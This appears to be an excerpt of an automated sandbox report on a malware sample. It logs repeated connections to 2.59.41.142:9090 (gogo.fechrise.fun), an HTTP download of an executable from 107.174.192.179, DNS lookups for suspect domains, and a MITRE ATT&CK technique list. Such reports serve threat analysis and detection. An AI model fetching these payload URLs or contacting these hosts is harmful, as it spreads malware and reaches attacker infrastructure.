6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
107.174.192.179:80

http://107.174.192.179/app/f73ae_003.exe

http

rapes.exe

48.8kB
1.4MB
1011
1010

HTTP Request

GET http://107.174.192.179/app/f73ae_003.exe

HTTP Response

200
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

190 B
132 B
4
3
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

190 B
132 B
4
3
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

282 B
172 B
6
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4
2.59.41.142:9090

gogo.fechrise.fun

kZZeUXM.exe

236 B
172 B
5
4

8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

geo.netsupportsoftware.com

dns

bild.exe

72 B
120 B
1
1

DNS Request

geo.netsupportsoftware.com

DNS Response

104.26.1.231

104.26.0.231

172.67.68.212
8.8.8.8:53

ferromny.digital

dns

MSBuild.exe

62 B
174 B
1
1

DNS Request

ferromny.digital

DNS Response

104.21.64.1

104.21.16.1

104.21.112.1

104.21.32.1

104.21.96.1

104.21.80.1

104.21.48.1
8.8.8.8:53

gogo.fechrise.fun

dns

kZZeUXM.exe

63 B
79 B
1
1

DNS Request

gogo.fechrise.fun

DNS Response

2.59.41.142
8.8.8.8:53

c.pki.goog

dns

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.180.3
8.8.8.8:53

t.me

dns

MSBuild.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

cosmosyf.top

dns

MSBuild.exe

58 B
170 B
1
1

DNS Request

cosmosyf.top

DNS Response

104.21.112.1

104.21.48.1

104.21.64.1

104.21.32.1

104.21.80.1

104.21.96.1

104.21.16.1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion